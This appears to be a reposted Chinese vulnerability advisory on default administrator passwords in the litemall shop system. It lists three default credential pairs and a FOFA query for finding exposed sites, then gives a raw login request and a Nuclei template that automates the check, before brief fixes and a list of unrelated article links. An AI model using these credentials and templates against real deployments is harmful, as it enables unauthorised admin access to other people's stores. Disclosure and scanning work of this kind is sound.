litemall系统默认弱口令漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

litemall是一个简单的商场系统,包含小程序客户端、移动客户端和网页管理端。技术采用Spring Boot后端 + Vue管理员前端 + 微信小程序用户前端 + Vue用户移动端。

litemall 20220508存在多个默认口令,攻击者可通过此漏洞进入后台。

默认密码

超级管理员用户名: admin123 超级管理员密码:admin123
商城管理员用户名: mall123 商城管理员密码:mall123
推广管理员用户名: promotion123 推广管理员密码:promotion123

Ⅱ、fofa语句

title="litemall"

Ⅲ、漏洞复现

POC

POST /admin/auth/login HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 42
sec-ch-ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

{"username":"admin123","password":"admin123"}

1、构建poc

2、超级管理员登录

3、商城管理员登录

4、推广管理员登录

Ⅳ、Nuclei-POC

id: litemall

info:
  name: litemall 20220508存在多个默认口令,攻击者可通过此漏洞进入后台。
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="litemall"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /admin/auth/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Length: 42
        sec-ch-ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
        Accept: application/json, text/plain, */*
        Content-Type: application/json;charset=UTF-8
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
        sec-ch-ua-platform: "Windows"
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

        {"username":"admin123","password":"admin123"}


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"admin123","成功")

Ⅴ、修复建议

1、请联系厂商进行修复;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/397045.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Emlog博客网站快速搭建并结合内网穿透实现远程访问本地站点

Emlog博客网站快速搭建并结合内网穿透实现远程访问本地站点

文章目录 前言1. 网站搭建1.1 Emolog网页下载和安装1.2 网页测试1.3 cpolar的安装和注册 2. 本地网页发布2.1 Cpolar临时数据隧道2.2.Cpolar稳定隧道(云端设置)2.3.Cpolar稳定隧道(本地设置) 3. 公网访问测试总结 前言 博客作为使…
阅读更多...
VMware还原Windows11 ghost镜像

VMware还原Windows11 ghost镜像

文章目录 环境步骤准备制作启动iso文件创建虚拟机启动虚拟机还原Windows 参考 环境 Windows 11 家庭中文版VMware Workstation 17 Pro石大师装机大师Windows 11 ghost系统镜像 步骤 准备 下载好Windows 11 ghost系统镜像,我下载的文件是 FQ_WIN11_X64_VDL_V2080…
阅读更多...
list链表

list链表

1. list基本概念 功能:将数据进行链式存储 链表(list)是一种物理存储单元上非连续的存储结构,数据元素的逻辑顺序是通过链表中的指针链接实现的 链表的组成:链表由一系列结点组成 结点的组成:一个是存储数据…
阅读更多...
Go 是否有三元运算符?Rust 和 Python 是怎么做的?

Go 是否有三元运算符?Rust 和 Python 是怎么做的?

嗨,大家好!本文是系列文章 Go 技巧第十四篇,系列文章查看:Go 语言技巧。 今天来聊聊在 Go 语言中是否支持三元运算符。这个问题很简单,没有。 首先,什么是三元运算符? 在其他一些编程语言中&a…
阅读更多...
深入理解flinksql执行流程,calcite与catalog相关概念,扩展解析器实现语法的扩展

深入理解flinksql执行流程,calcite与catalog相关概念,扩展解析器实现语法的扩展

深入理解Flink Sql执行流程 1 Flink SQL 解析引擎1.1SQL解析器1.2Calcite处理流程1.2.1 SQL 解析阶段(SQL–>SqlNode)1.2.2 SqlNode 验证(SqlNode–>SqlNode)1.2.3 语义分析(SqlNode–>RelNode/RexNode&#…
阅读更多...
代码随想录算法训练营DAY20 | 二叉树(7) (续)

代码随想录算法训练营DAY20 | 二叉树(7) (续)

一、LeetCode 236 二叉树的最近公共祖先 题目链接:236.二叉树的最近公共祖先https://leetcode.cn/problems/lowest-common-ancestor-of-a-binary-tree/description/ 思路:利用后序遍历是天然回溯过程、方便实现自底向上查找的原理,递归寻找公…
阅读更多...
面试系列之《Spark》(持续更新...)

面试系列之《Spark》(持续更新...)

1.job&stage&task如何划分? job:应用程序中每遇到一个action算子就会划分为一个job。 stage:一个job任务中从后往前划分,分区间每产生了shuffle也就是宽依赖则划分为一个stage,stage这体现了spark的pipeline思…
阅读更多...
普中51单片机学习(十四)

普中51单片机学习(十四)

中断系统 中断的概念 CPU在处理某一事件A时,发生了另一事件B请求CPU迅速去处理(中断发生),CPU暂时中断当前的工作,转去处理事件B(中断响应和中断服务),待CPU将事件B处理完毕后,再回到原来事件…
阅读更多...
js_三种方法实现深拷贝

js_三种方法实现深拷贝

深拷贝( 递归 ) 适用于需要完全独立于原始对象的场景,特别是当对象内部有引用类型时,为了避免修改拷贝后的对象影响到原始对象,就需要使用深拷贝。 // 原始对象 const obj { uname: Lily,age: 19,hobby: [乒乓球, 篮球…
阅读更多...
BGP 邻居建立

BGP 邻居建立

拓扑图 配置 BGP进程号及为AS号 使用环回口建立BGP邻居关系时,需要指定更新源地址 EBGP在使用环回口建立邻居关系时,需配置EBGP多跳,环回口路由可达 EBGP的路由器存在IBGP邻居时,需要配置next-hop-local,保证下一跳…
阅读更多...
Midjourney风格一致功能解读及使用方法

Midjourney风格一致功能解读及使用方法

Midjourneys再次迎来更新,本次新增“风格一致”功能!用户期待已久的风格模仿功能终于实现了! --sref 虽然目前只是测试功能,但已经相当强大了,这篇文章我将带大家先睹为快! 别忘了,这个功能目前…
阅读更多...
Python中HTTP客户端库的比较与选择

Python中HTTP客户端库的比较与选择

在Python中,众多HTTP客户端库为我们提供了与Web服务进行交互的便利。每个库都有其独特的特点和适用场景,选择哪一个往往取决于项目的具体需求和个人偏好。下面,我们将对几个流行的HTTP客户端库进行比较,以助您在项目中做出明智的选…
阅读更多...
Rabbitmq入门与应用(三)-RabbitMQ开发流程

Rabbitmq入门与应用(三)-RabbitMQ开发流程

RabbitMQ开发流程 引入依赖 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-amqp</artifactId> </dependency>配置MQ 最简配置 spring:rabbitmq:host: mq的安装机器ipport: 5672username: ad…
阅读更多...
如何查看 CPU 占用高的进程

如何查看 CPU 占用高的进程

1、使用 top 命令&#xff0c;查看 cpu 占用超过 100% 2、查看哪个进程占用 cpu 最高&#xff08;该案例使用阿里的 arthas 来查看&#xff09; 2.1 下载&#xff1a;curl -O https://arthas.aliyun.com/arthas-boot.jar 2.2 启动命令&#xff1a;java -jar arthas-boot.jar …
阅读更多...
VPX信号处理卡设计原理图:9-基于DSP TMS320C6678+FPGA XC7V690T的6U VPX信号处理卡 信号处理 无线电通信

VPX信号处理卡设计原理图:9-基于DSP TMS320C6678+FPGA XC7V690T的6U VPX信号处理卡 信号处理 无线电通信

一、概述 本板卡基于标准6U VPX 架构&#xff0c;为通用高性能信号处理平台&#xff0c;系我公司自主研发。板卡采用一片TI DSP TMS320C6678和一片Xilinx公司Virtex 7系列的FPGA XC7V690T-2FFG1761I作为主处理器&#xff0c;Xilinx 的Aritex XC7A200T作为辅助处理器。XC7A2…
阅读更多...
美团商家地址电话

美团商家地址电话

阅读更多...
AI之Sora:Sora(文本指令生成视频的里程碑模型)的简介(能力/安全性/技术细节)、使用方法、案例应用之详细攻略

AI之Sora:Sora(文本指令生成视频的里程碑模型)的简介(能力/安全性/技术细节)、使用方法、案例应用之详细攻略

AI之Sora&#xff1a;Sora(文本指令生成视频的里程碑模型)的简介(能力/安全性/技术细节)、使用方法、案例应用之详细攻略 导读&#xff1a;Sora 是OpenAI研发的一个可以根据文字描述生成视频的AI模型。它的主要特性、功能以及OpenAI在安全和应用方面的策略的核心要点如下所示&a…
阅读更多...
2024年1月国产数据库大事记-墨天轮

2024年1月国产数据库大事记-墨天轮

本文为墨天轮社区整理的2024年1月国产数据库大事件和重要产品发布消息。 目录 2024年1月国产数据库大事记 TOP102024年1月国产数据库大事记&#xff08;时间线&#xff09;产品/版本发布兼容认证代表厂商大事记 厂商2023年终总结合辑排行榜新增数据库厂商活动 2024年1月国产…
阅读更多...
【LeetCode: 105. 从前序与中序遍历序列构造二叉树 + DFS】

【LeetCode: 105. 从前序与中序遍历序列构造二叉树 + DFS】

&#x1f680; 算法题 &#x1f680; &#x1f332; 算法刷题专栏 | 面试必备算法 | 面试高频算法 &#x1f340; &#x1f332; 越难的东西,越要努力坚持&#xff0c;因为它具有很高的价值&#xff0c;算法就是这样✨ &#x1f332; 作者简介&#xff1a;硕风和炜&#xff0c;…
阅读更多...
【教3妹学编程-算法题】相同分数的最大操作数目 I

【教3妹学编程-算法题】相同分数的最大操作数目 I

3妹&#xff1a;2哥&#xff0c;干嘛呢&#xff0c;怎么又在吃泡面 2哥 : 这不是过年下血本&#xff0c;给小侄子买了一个ps5吗&#xff0c; 哎&#xff0c;我自己都舍不得用&#xff0c;不能让人说咱小气不是。 3妹&#xff1a;神马&#xff0c;他才6岁吧&#xff0c; 就这么喜…
阅读更多...
最新文章

Copyright @ 2022~2023